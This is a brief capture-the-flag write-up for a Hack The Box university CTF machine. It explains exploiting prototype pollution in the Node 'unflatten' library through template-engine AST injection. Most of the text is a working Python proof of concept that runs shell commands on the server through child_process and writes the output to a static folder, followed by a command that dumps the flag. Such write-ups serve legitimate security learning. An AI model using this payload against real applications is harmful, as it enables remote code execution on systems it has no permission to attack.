This machine was a part of HTB university CTfF in 2020
Walk-Through
After some inspection turns out this machine running a node web-app.
Source code reveals a comment that hints towards the exploit being caused by ‘prototype pollution in unflatten’.
this message:
unflatten seems outdated and a bit vulnerable to prototype pollution we sure hope so that po6ix doesn’t pwn our puny app with his AST injection on template engines.
After doing some research on the vulnerability i found this cool blog
it has a nice little POC you can use which i extracted this s.code:
import requests
TARGET_URL = 'http://localhost:1337'
TARGET_URL = 'http://docker.hackthebox.eu:30448'
# make pollution
r = requests.post(TARGET_URL+'/api/submit', json = {
"artist.name":"Gingell",
"__proto__.type": "Program",
"__proto__.body": [{
"type": "MustacheStatement",
"path": 0,
"params": [{
"type": "NumberLiteral",
"value": "process.mainModule.require('child_process').execSync(`whoami > /app/static/out`)"
}],
"loc": {
"start": 0,
"end": 0
}
}]
})
print(r.status_code)
print(r.text)
print(requests.get(TARGET_URL+'/static/out').text)
the bad thing is it’s a blind vuln so we won’t see any feedback for now.
but after running we know the path to the static folder is /app/static
we can write files into this path and then request them to see the output.
after pwning and getting a user shell I found the flag in the stati/out
directory using the following bash script
cat flag* > /app/static/out
Flag:
HTB{wh3n_l1f3_g1v3s_y0u_p6_*****_*****_****_****}